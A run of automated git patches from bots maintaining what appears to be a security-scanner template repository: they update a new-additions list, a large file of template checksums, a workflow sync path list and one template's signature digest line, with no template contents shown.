82925b02f81dfdf6832cd051937d49cae1aec923 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:11:42 +0000 Subject: [PATCH 16/53] Auto Generated New Template Addition List [Wed Mar 20 04:11:42 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4627f5e9d0..932ae622c6 100644 --- a/.new-additions +++ b/.new-additions @@ -27,6 +27,7 @@ file/keys/wireguard/wireguard-private.yaml http/cves/2023/CVE-2023-49785.yaml http/cves/2023/CVE-2023-5830.yaml http/cves/2023/CVE-2023-5914.yaml +http/cves/2024/CVE-2024-1212.yaml http/cves/2024/CVE-2024-1698.yaml http/exposed-panels/bynder-panel.yaml http/exposed-panels/cisco/cisco-expressway-panel.yaml From a35069ee22b0a20ebee646d2be759e8211c7ec44 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 04:11:56 +0000 Subject: [PATCH 17/53] Auto Generated Templates Checksum [Wed Mar 20 04:11:56 UTC 2024] :robot: --- templates-checksum.txt | 75 +++++++++++++++++++++--------------------- 1 file changed, 38 insertions(+), 37 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7516f9bdb0..649fc4f262 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -10,7 +10,7 @@ TOP-10.md:06a54531fef2bfc5ec2fa38485a3e30c247a3132 cloud/enum/aws-app-enum.yaml:26d0dcf57c7ba8003940ed1d53a62971564b2018 cloud/enum/aws-s3-bucket-enum.yaml:0d101b898bbaebceea4020963d11829f8167029f cloud/enum/azure-db-enum.yaml:3d29a3c86288356d862922ef0527de99187bf734 -cloud/enum/azure-vm-cloud-enum.yaml:69ca5c626f0061e4c9bcc922bf9e05f078459bd2 +cloud/enum/azure-vm-cloud-enum.yaml:6d9043c907009b2ff6afc6cd09bd35a6d27f6fe9 cloud/enum/azure-website-enum.yaml:037397591c799d32eb8abc94a346ff0805d68204 cloud/enum/gcp-app-engine-enum.yaml:b22ff0601a3f7f6ddc39e39ab9dc34410d213e41 cloud/enum/gcp-bucket-enum.yaml:896300c26517adf67feb80304f5edb25590a03c4 @@ -1199,7 +1199,7 @@ http/cves/2017/CVE-2017-16894.yaml:0c7f7d0bdb16cdff6e7a380ba56208eb1ca9d6e6 http/cves/2017/CVE-2017-17043.yaml:b45105c0de0d90d61a79191de73976e9cd4fb790 http/cves/2017/CVE-2017-17059.yaml:d40f8c2b908798457c9b02fa98a480b8bc0a7215 http/cves/2017/CVE-2017-17451.yaml:04b0b3fec8b256c76cef8ea892836c2e420878b8 -http/cves/2017/CVE-2017-17562.yaml:f73fd69cc36d28c4be6a6747c45f942f857029ef +http/cves/2017/CVE-2017-17562.yaml:2e22c184cd57f7425fba3827242a122c39dc86e8 http/cves/2017/CVE-2017-17731.yaml:1666574cd4dfc7a3995867c7c4b621b267b885ff http/cves/2017/CVE-2017-17736.yaml:877434782e6a2c5b3095498877a022c3551b6ca8 http/cves/2017/CVE-2017-18024.yaml:6b154b9615599e11764e703081eca6329935ee5e @@ -1496,7 +1496,7 @@ http/cves/2019/CVE-2019-16932.yaml:182fef4932dc7931c45cd3d7aebdaeef9ded81e8 http/cves/2019/CVE-2019-16996.yaml:ad524a9c60b54d610e8c55acaa46e4958a9b8dce http/cves/2019/CVE-2019-16997.yaml:e103b4c103866170ecfaef2fcf0e2cf88609b940 http/cves/2019/CVE-2019-17270.yaml:8f282f5849f13dda11bbb8837079bb223d9687fb -http/cves/2019/CVE-2019-17382.yaml:2a14f06044507c830b2d10f4a86315439d64f88f +http/cves/2019/CVE-2019-17382.yaml:f76bdf75f84fdcae6c031cc28c3420d8dc40f808 http/cves/2019/CVE-2019-17418.yaml:dbeea758a5b8de4c18d2d8790798711113d69195 http/cves/2019/CVE-2019-17444.yaml:7b94376c34d962236141cba63543376257005654 http/cves/2019/CVE-2019-17503.yaml:6701aacab1ee79d24acd3cbd1497fb50399ad671 @@ -2398,7 +2398,7 @@ http/cves/2022/CVE-2022-1933.yaml:97c269db3367ffd56494243b090e307b4eb0b586 http/cves/2022/CVE-2022-1937.yaml:f888a42c920fb30ae5b563bf642af334cd97da95 http/cves/2022/CVE-2022-1946.yaml:982f4f9519b1a137a8d2f2c71c7f2225cb67da1d http/cves/2022/CVE-2022-1952.yaml:4c4d64ceb64295942d0d9c2c1ae79a9bc6a16ee7 -http/cves/2022/CVE-2022-2034.yaml:db07244959fe5aec265a0b9f1e8b398a93a6076c +http/cves/2022/CVE-2022-2034.yaml:6d1a2c994d2ebda1cdcdc84b36237565c66c592a http/cves/2022/CVE-2022-21371.yaml:e9b20049b90afecb519db58387e5922047ef5944 http/cves/2022/CVE-2022-21500.yaml:7a87435ea2a54ac9c454a344a87fd21e51758b36 http/cves/2022/CVE-2022-21587.yaml:9e40fc00a04665d81ac142e197d40f1926a521c6 @@ -2480,7 +2480,7 @@ http/cves/2022/CVE-2022-25489.yaml:5c5c7a7388f9e133b0cf380bad27eeaebb0c2a74 http/cves/2022/CVE-2022-25497.yaml:07424dc06af0ea2d10c5aa1a201ce4d0f2d26848 http/cves/2022/CVE-2022-2551.yaml:a2dc5d4686710a2e9aeea1bdadf8f7fac2f3766f http/cves/2022/CVE-2022-25568.yaml:aabffcf5827e7ee05211b2651ca350e913371665 -http/cves/2022/CVE-2022-2599.yaml:51779e43ad99b49a367ddd03a76fc22508c0c15c +http/cves/2022/CVE-2022-2599.yaml:f576fefcf8da91a4c868c4b06cad0a2ed36884cb http/cves/2022/CVE-2022-26134.yaml:788a7f51e1550cc5770aab979234ac35b54d2505 http/cves/2022/CVE-2022-26138.yaml:15d0534ab6765d2e536070eda15d020e04f43abc http/cves/2022/CVE-2022-26148.yaml:f37f9182974b9dd8d49af32a7ef9841fe7d704ae @@ -2819,7 +2819,7 @@ http/cves/2023/CVE-2023-24278.yaml:e397c7d647c7517b78e44dbc79c8fcbc80480623 http/cves/2023/CVE-2023-24322.yaml:c4b5cc0d4d70fa16682f706a954b95c84e0e7896 http/cves/2023/CVE-2023-24367.yaml:dab63258fffca6b44d754ede551d56eea925a477 http/cves/2023/CVE-2023-24488.yaml:8a381e70fd0643ed5d1371edb70b40e25e9b5ff8 -http/cves/2023/CVE-2023-24489.yaml:ffcbd0678ae55a267244d0a62703c1756b701aae +http/cves/2023/CVE-2023-24489.yaml:c895cc71b777b3ada793ebcddd00274157f7927d http/cves/2023/CVE-2023-24657.yaml:1efdbfecef2aacf600fb007989d4efc6aa9d7fbe http/cves/2023/CVE-2023-24733.yaml:f1b740ac9ba1fc859deb3c69798e1bc3d302ed4e http/cves/2023/CVE-2023-24735.yaml:e38322978b1598d32056adb11572c6c401107c40 @@ -3085,6 +3085,7 @@ http/cves/2024/CVE-2024-1071.yaml:672dd1ef0240ede4f06d3b98caf96f2f14bd1e8e http/cves/2024/CVE-2024-1208.yaml:6f0363cecc95a2187f9fbca30620a2d39d87eb15 http/cves/2024/CVE-2024-1209.yaml:36f848394da33f75c2198b8f5b9081f212b3ecd1 http/cves/2024/CVE-2024-1210.yaml:1333fe26c55e1b4e44bcfdc0e0de5226a053f949 +http/cves/2024/CVE-2024-1212.yaml:048e1190f404d00105e446714c22fd44431bd387 http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:7f5ad668e9c8e5ab56afee96df8907d7ccc71e0b http/cves/2024/CVE-2024-21644.yaml:e8d58594c2dc1021f9107eee925f11791e0627e7 @@ -3206,7 +3207,7 @@ http/default-logins/ofbiz/ofbiz-default-login.yaml:2e6eea7863853fca0a5546a479d43 http/default-logins/openemr/openemr-default-login.yaml:e47d165fc7a306238827e4ea1497307f932890cd http/default-logins/openmediavault/openmediavault-default-login.yaml:efb418987e7a7b80b6fc9ea78f883b4dcaa90efe http/default-logins/oracle/businessintelligence-default-login.yaml:29309871b052bb3f05de613e838dadb92dd47f79 -http/default-logins/oracle/peoplesoft-default-login.yaml:5da182e00f57e6927f30674cde5f7bae9de6bbd4 +http/default-logins/oracle/peoplesoft-default-login.yaml:21071ffc4b0449f88570d4d604038756ccd18209 http/default-logins/others/aruba-instant-default-login.yaml:398f77a4e4e01153465c51bdfeb3cf53f670a85b http/default-logins/others/ciphertrust-default-login.yaml:9d29315f7fd68f1e4f55dd046bf7c716658ef13e http/default-logins/others/cnzxsoft-default-login.yaml:71898b0928c2f380612addb0350fb686dd84e025 @@ -3292,7 +3293,7 @@ http/exposed-panels/acunetix-panel.yaml:b10cd9d4a29dea26e161ddeb85b6b920efd69870 http/exposed-panels/addonfinance-portal.yaml:38506f2dd6a3a69108a50fe67a2686af99398590 http/exposed-panels/adhoc-transfer-panel.yaml:dcce7565c43f4ea78e2a3ad9fc8216f301f05c94 http/exposed-panels/adiscon-loganalyzer.yaml:fc2432f93a3fd7724c3f0d2814d41c065e0b8b21 -http/exposed-panels/adminer-panel-detect.yaml:89f3dfcb1a75493cc7d806df52ee64b3e65450fa +http/exposed-panels/adminer-panel-detect.yaml:2c1c41366071aef22dcd3f0fb77608e8ba4d18d8 http/exposed-panels/adminer-panel.yaml:b266fbab664e4ee130429e725409cf78000739e0 http/exposed-panels/adminset-panel.yaml:2be3fbb1ec0fe028405fdb0353163d1352a14d65 http/exposed-panels/adobe/adobe-component-login.yaml:ca846d96566ad14a055b85c15bd2b61e3a786d8d @@ -4340,7 +4341,7 @@ http/exposures/apis/wadl-api.yaml:7a728eb7a4cb779218d582661a7fb2978abedc03 http/exposures/apis/wsdl-api.yaml:e28378d37cb724e50ad74e13158210a704a2d9df http/exposures/backups/exposed-mysql-initial.yaml:546b26c48697aa27b99c9d385c509b1af10e8907 http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db58cc8f06c984 -http/exposures/backups/php-backup-files.yaml:505b1da333d78f3266443cab2fa4f9a6e57d6635 +http/exposures/backups/php-backup-files.yaml:2c05d22cc231014da2a5964eee452bf96706b391 http/exposures/backups/settings-php-files.yaml:4deb7ac78c1f7df72c6efad11c7ce77373c3ba7b http/exposures/backups/sql-dump.yaml:e989e8b4ad56b0ed996c7dc9cec7eab2210c223c http/exposures/backups/zip-backup-files.yaml:0b4309555d6a4f0fee56b49d302d209baccb808e @@ -4822,19 +4823,19 @@ http/exposures/tokens/zendesk/zendesk-key.yaml:002e66de48b921b1485a90c9ee0b8202d http/exposures/tokens/zenserp/zenscrape-api-key.yaml:a8b850b2efaae638efc02b5d207fe6bc855610e9 http/exposures/tokens/zenserp/zenserp-api-key.yaml:dc1d18779abf2831c2b624b8cebad22f57bad735 http/exposures/tokens/zoho/zoho-webhook-token.yaml:213408cbf1610741f4f31da89e8dba8f3d5b20eb -http/fuzzing/cache-poisoning-fuzz.yaml:55b0174b93ae85bcd2a5bd8dae8d5f2ee6dc183c -http/fuzzing/header-command-injection.yaml:531a6bae6185a29c431f42e8f2d0e4931ec82d05 -http/fuzzing/iis-shortname.yaml:3b02c03dfa0000145db4e569e9894ae9f9bfe4e0 -http/fuzzing/linux-lfi-fuzzing.yaml:98fb1f938fadd7dbef664b4fb90f70340998090d -http/fuzzing/mdb-database-file.yaml:f10257c4e4200709619934b82ad68db7c8ddf918 -http/fuzzing/prestashop-module-fuzz.yaml:7dad3e5599c90ca0dd227bebde42d56d3dc4fe8d -http/fuzzing/ssrf-via-proxy.yaml:61406c0b18b887b8b0820c01ccb006f25a8febf2 -http/fuzzing/valid-gmail-check.yaml:a9ddd0375c3160a61a5f2387c1113b9b64df8879 -http/fuzzing/waf-fuzz.yaml:d748d662ef552cee252b45d68017a09286c6eb93 -http/fuzzing/wordpress-plugins-detect.yaml:6a6a62082132ee13694282e8b77818db20ae5e64 -http/fuzzing/wordpress-themes-detect.yaml:bac6070c72b0db61adc5945ec1b14326c766cd14 -http/fuzzing/wordpress-weak-credentials.yaml:31dff20ca524cae856476baac860a09fd9a536ed -http/fuzzing/xff-403-bypass.yaml:debf58b69daf4676a60aba8af99fd6dc99df1d7d +http/fuzzing/cache-poisoning-fuzz.yaml:f98fed523a1e8b80a6c5c12183c6f072bb81cf5e +http/fuzzing/header-command-injection.yaml:bf0af66d12ef68c553a7a0d496f469788f3d03c3 +http/fuzzing/iis-shortname.yaml:aafbc44fc50e604004bf52f14b83354e24163827 +http/fuzzing/linux-lfi-fuzzing.yaml:a92bbc9f1c966c3f909279c49e2dee0a2bfffac9 +http/fuzzing/mdb-database-file.yaml:f6bb4e9e482516e6a861cc1efc68063e61778d13 +http/fuzzing/prestashop-module-fuzz.yaml:8e7f0e0bd609549e38f8eadc603360e8a56f2a02 +http/fuzzing/ssrf-via-proxy.yaml:8b57f45fe9d33268b5ae1dcd1a73301a47dfee62 +http/fuzzing/valid-gmail-check.yaml:a91c4df030cbeb5d163df9a3150cb146eb495412 +http/fuzzing/waf-fuzz.yaml:0bf3b44516d1eab46bbc11fb2eada0293c76a2ad +http/fuzzing/wordpress-plugins-detect.yaml:4bd980e6a9b9246896b0961dbff25a199038bcf0 +http/fuzzing/wordpress-themes-detect.yaml:86b90c67fd9c7fb48a6eff67fdb63a185f402ea8 +http/fuzzing/wordpress-weak-credentials.yaml:13dbc34b62167f75f802b83a3e71d89387ba54a6 +http/fuzzing/xff-403-bypass.yaml:23f78013ddcc53b07fbc3a114f0eaa45f90001d5 http/honeypot/citrix-honeypot-detect.yaml:a632cb08a12e2d3dfe69f8b4e8d0cbd4d44cbbc5 http/honeypot/dionaea-http-honeypot-detect.yaml:7830d2af83e16b50c0a4b647defe89c9ac5efe25 http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa @@ -4895,7 +4896,7 @@ http/miscellaneous/balada-injector-malware.yaml:46e26d3735f737c251df9a46d7091f3d http/miscellaneous/clientaccesspolicy.yaml:f1ce4622fb979da2754ffba7bf52cdfe3fc470d0 http/miscellaneous/crypto-mining-malware.yaml:10c82a94c2cf226eb22b8ac8e10dc88d8aa24387 http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3a5499e5 -http/miscellaneous/defacement-detect.yaml:4bb02fec3ec11dcb407a956be1fc2f0a6bcc9897 +http/miscellaneous/defacement-detect.yaml:0636060c6c434c29a127d7cac1a29f86167d420e http/miscellaneous/detect-dns-over-https.yaml:46b316a9632c17d9cf75cbb27de9c706c9a14b0b http/miscellaneous/dir-listing.yaml:dad3bf5aa871745ab62bf6f4b61909bde637e326 http/miscellaneous/email-extractor.yaml:5815f093718b70c0b64c4c423cd1ec8ab94f1281 @@ -4912,7 +4913,7 @@ http/miscellaneous/maxforwards-headers-detect.yaml:9d69555c1fc58f644b5ccf2644e0a http/miscellaneous/microsoft-azure-error.yaml:bfa3c53d4023d524a09ba3565bd3bf63204ac58a http/miscellaneous/moodle-changelog.yaml:9dbf59caabecc08967456fa3986046e33f4dbf43 http/miscellaneous/netflix-conductor-version.yaml:31ad2c649ff4aa0703a5c7cd4e36d2245a8993e0 -http/miscellaneous/ntlm-directories.yaml:8d2b0ffc05206f993712a9bbd94071107bcda074 +http/miscellaneous/ntlm-directories.yaml:8d52b0df9375267f6ba7840037a48a96cb971dda http/miscellaneous/old-copyright.yaml:de816764aefeaf59f75201740f4f82fb31071194 http/miscellaneous/options-method.yaml:2e0edc5993baa53c6fb7e8307c80ea26254bc3e4 http/miscellaneous/rdap-whois.yaml:c25cfe8b61f82c032de77398cf1aed94f56f0004 @@ -4958,7 +4959,7 @@ http/misconfiguration/aem/aem-secrets.yaml:346f23f7070fdf59c2c76fddd12a5eb4f31c7 http/misconfiguration/aem/aem-security-users.yaml:ff974be49aaee03897db4a6d40117b9e5d02598d http/misconfiguration/aem/aem-setpreferences-xss.yaml:dd08fc188a7ad278c8ee3082b66d9d2282d1c9e8 http/misconfiguration/aem/aem-sling-userinfo.yaml:f38274749b0668275a6b8cdddc2707bbde9eb1a0 -http/misconfiguration/aem/aem-userinfo-servlet.yaml:47c5ab71db4a7fde4c72b30d1c273f2dc2e637b9 +http/misconfiguration/aem/aem-userinfo-servlet.yaml:4e42c3fd5d4ae21b1e0a686a35c69394d1d9d32b http/misconfiguration/aem/aem-wcm-suggestions-servlet.yaml:cc07ee10590df2dd7de1d03c73167bbd4d81b95b http/misconfiguration/aem/aem-xss-childlist-selector.yaml:a9ecdb229a17db9192821a583549813a1bb1fc3c http/misconfiguration/airflow/airflow-debug.yaml:c18746cecd6f440d9367f6ebe1ce70ff34e508af @@ -5073,7 +5074,7 @@ http/misconfiguration/gitlab/gitlab-public-repos.yaml:1a2b426983d0ca449461a9ece3 http/misconfiguration/gitlab/gitlab-public-signup.yaml:f604c8044baffdf63ed2215ccec5b5721202144b http/misconfiguration/gitlab/gitlab-public-snippets.yaml:64aa47f34d185b8bbbc04b242eb0a76886d641ec http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml:d9959b940359896de41142fe765303a3627c7ae5 -http/misconfiguration/gitlab/gitlab-user-enum.yaml:899a8a3e6898f4898986bb1bda5e248b360bd427 +http/misconfiguration/gitlab/gitlab-user-enum.yaml:09ffd851b3108524029e04ca4f1a501e1c580757 http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb6a220e http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc @@ -5320,9 +5321,9 @@ http/misconfiguration/proxy/metadata-hetzner.yaml:99b85a4199e83eff23ec416b6b6fff http/misconfiguration/proxy/metadata-openstack.yaml:6e1984d2e3aa87e07e6b7db80dbd7c9d10c9d417 http/misconfiguration/proxy/metadata-oracle.yaml:93d94888c382735e755c96a1908859778f1308ef http/misconfiguration/proxy/open-proxy-external.yaml:e05b7e6f0744ee250192e9167a89b4d6c7dfdee1 -http/misconfiguration/proxy/open-proxy-internal.yaml:5de892d38ee34977924d4eb2cbd644b4b51fe567 -http/misconfiguration/proxy/open-proxy-localhost.yaml:4cd4b2b6c999578dff79a1d9d0aab65b759db464 -http/misconfiguration/proxy/open-proxy-portscan.yaml:e4806af440f78fced0b1239e83f9a5b440c4b4ee +http/misconfiguration/proxy/open-proxy-internal.yaml:231fecdb37f031eb304aba2267a8ba6ad16641ec +http/misconfiguration/proxy/open-proxy-localhost.yaml:583e013ed1b8deaaa42735861dc5201a8285afc6 +http/misconfiguration/proxy/open-proxy-portscan.yaml:790b7ea770648cb312cb5c103951c3c7254cb0c2 http/misconfiguration/puppetdb-dashboard.yaml:5b1f354f5ab9343e46a20bd7c76a8ee044cf71b4 http/misconfiguration/put-method-enabled.yaml:4cbb1715aeb73cf6e638b02c9951ff02c7a67756 http/misconfiguration/python-metrics.yaml:0b1d1102e4329ebf75ae5cc259898f1cb1cd9670 @@ -6447,7 +6448,7 @@ http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80c http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29 http/technologies/graphql-detect.yaml:a0566e15058b3aeb2d4dae77cc99d23355938dac http/technologies/grav-cms-detect.yaml:f353a0fa76204ccd1c894aa850f977fef8c769f1 -http/technologies/graylog/graylog-api-exposure.yaml:c669347801d0d2a1ec1f100228f4f48e99f28dd9 +http/technologies/graylog/graylog-api-exposure.yaml:d101cae7fd923dd7f233bf27e3a9b3628b8c3d5e http/technologies/graylog-api-browser.yaml:5aaa8bff99b57cf700d0923b48778048789f2389 http/technologies/gunicorn-detect.yaml:4e32fda7d9483af8c21fd3ea7fa6669266e23d0d http/technologies/hanwang-detect.yaml:4866144f96b1fbc18567e10ad7732b8a1a8dfc5f @@ -7702,7 +7703,7 @@ http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:63ec56f7d http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:26127f055c9c3ffa79366002ca95ea0c80a9c1dc http/vulnerabilities/tongda/tongda-api-file-upload.yaml:868bdf72215e96c1c0b2f2a4e68ecefa98bf453c http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:813a5228a57a292be77d48351f979e9b4ce4bdcc -http/vulnerabilities/tongda/tongda-auth-bypass.yaml:f661e567e8d9b51bdf29cc07155b552b92beab20 +http/vulnerabilities/tongda/tongda-auth-bypass.yaml:99626945f8fb206ae2046e9f22cebadaef9eef0e http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml:d1d9be064a074860683581a4e84f8e85a3abfc27 http/vulnerabilities/tongda/tongda-getdata-rce.yaml:b4452e0abc9faa89378a2d6b14c6ef99eddbb56d http/vulnerabilities/tongda/tongda-getway-rfi.yaml:02cae92f443ca026546155a79f51aab073d2a0dd @@ -7944,7 +7945,7 @@ http/vulnerabilities/wordpress/wp-vault-lfi.yaml:12ee639ae8dd7fb66560ac713aab3a4 http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml:d36b1dafca4c01fbc15d17c4e884144f36974304 http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml:9cd53ef3a743e970ff37c36b2c9640781d578878 http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml:0e1c6d447132c374e620d553de2cd8a8468f917e -http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:9d1201fd282d799868a36ce2c49476f8c146711e +http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:a9c485aef2957f73eec1ea22a2b851f98284f9c9 http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml:f72f913987c22ad251d6b4b09e10fe57f20f0727 http/vulnerabilities/wordpress/wp-xmlrpc.yaml:b55a9ba158dc74c9797ce3cddb6464bf48106074 http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml:ec8dd93cf0c3f663465b7191136013def01f5d0f @@ -7985,13 +7986,13 @@ http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380694a0 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0 -javascript/cves/2023/CVE-2023-34039.yaml:15973462461926ddb4e6991f45579aa54ae7fc29 +javascript/cves/2023/CVE-2023-34039.yaml:d24071fd6387e212e60bd6503d2611015bea58cb javascript/cves/2023/CVE-2023-46604.yaml:5f4409197ba9dd7f86ae5de4beb6409ce7f1bfb8 javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3 javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad javascript/default-logins/redis-default-logins.yaml:f9a03987fac4e8150d9b8d5ab80779c6f41d8b7f -javascript/default-logins/ssh-default-logins.yaml:63a239d5a020912bf1e33b4ff59606e25181afe3 +javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f056234cbb62 javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94 javascript/detection/oracle-tns-listener.yaml:3d274f668de183b62c79c04782bf0740150b4423 javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04 @@ -8136,10 +8137,10 @@ network/misconfig/erlang-daemon.yaml:5360cef90f48dc3c6bdab6df6e44245f243f423c network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109 network/misconfig/mongodb-unauth.yaml:0a25bf55d5fedd1b56c397ae27e93483018ae16a -network/misconfig/mysql-native-password.yaml:a9f7b3791ec021bec37c88303be460decc98069f +network/misconfig/mysql-native-password.yaml:610a602de84dc589c5f48b133d27f6b77f3cc422 network/misconfig/printers-info-leak.yaml:3eaf0fc4e07c21308b3bd7f387f2f6765979ad15 network/misconfig/sap-router-info-leak.yaml:a7ebbd8a06f5add2a3ded6259da9b3b3b5e0f005 -network/misconfig/tidb-native-password.yaml:cee939c1ed6cf22fbd0fc3d2d6b4047ab02a5fa0 +network/misconfig/tidb-native-password.yaml:e59b6ae7f999845de1660e740e99c300175f2845 network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740 network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37 @@ -8170,7 +8171,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:59b8ce63bd6dd7ced361b025574c2da600135edb +templates-checksum.txt:ea62e7a3ece798218348e5276776aff198c9f2f8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4e054164e70f24755f60d729079d9da2cb01b304 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:12:27 +0000 Subject: [PATCH 18/53] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 663e5a316a..da7f634231 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -32,6 +32,7 @@ on: - 'http/cves/2023/CVE-2023-49785.yaml' - 'http/cves/2023/CVE-2023-5830.yaml' - 'http/cves/2023/CVE-2023-5914.yaml' + - 'http/cves/2024/CVE-2024-1212.yaml' - 'http/cves/2024/CVE-2024-1698.yaml' - 'http/exposed-panels/bynder-panel.yaml' - 'http/exposed-panels/cisco/cisco-expressway-panel.yaml' From 6f0124d586899720b35a1f62666fca927398824e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 04:13:43 +0000 Subject: [PATCH 19/53] Auto Template Signing [Wed Mar 20 04:13:43 UTC 2024] :robot: --- http/cves/2024/CVE-2024-1212.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml index f2464b4726..d27b2d6a70 100644 --- a/http/cves/2024/CVE-2024-1212.yaml +++ b/http/cves/2024/CVE-2024-1212.yaml @@ -44,3 +44,4 @@ http: - type: status status: - 200 +# digest: 4a0a004730450220557f3f2f5ab7b8e23925a9acc4979743940842b4936843aaae68876e24ed24a4022100f067f077e0dae8b1aa1264efb248349fdd7e6f95341ca06cbab9c183402f4e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0da4a266ce7d494b6fb72b24aac4d472d3667dd2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:57:34 +0000 Subject: [PATCH 20/53] Auto Generated New Template Addition List [Wed Mar 20 04:57:34 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 932ae622c6..0b99585cdf 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +dns/soa-detect.yaml file/keys/dependency/dependency-track.yaml file/keys/docker/dockerhub-pat.yaml file/keys/doppler/doppler-audit.yaml From 10c586a607fb9fb78fefee84e5db124e07f66c30 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 04:57:39 +0000 Subject: [PATCH 21/53] Auto Generated Templates Checksum [Wed Mar 20 04:57:39 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 649fc4f262..3b84c9da72 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -122,6 +122,7 @@ dns/mx-service-detector.yaml:197d6c83e04011fc0ae267e999cad25e85a19d58 dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735 dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656 dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 +dns/soa-detect.yaml:1d167b28182dd5423e0327242761e0ecfb886658 dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 dns/worksites-detection.yaml:c54ce778fe66a138e794b87520392f285c8b6259 @@ -3085,7 +3086,7 @@ http/cves/2024/CVE-2024-1071.yaml:672dd1ef0240ede4f06d3b98caf96f2f14bd1e8e http/cves/2024/CVE-2024-1208.yaml:6f0363cecc95a2187f9fbca30620a2d39d87eb15 http/cves/2024/CVE-2024-1209.yaml:36f848394da33f75c2198b8f5b9081f212b3ecd1 http/cves/2024/CVE-2024-1210.yaml:1333fe26c55e1b4e44bcfdc0e0de5226a053f949 -http/cves/2024/CVE-2024-1212.yaml:048e1190f404d00105e446714c22fd44431bd387 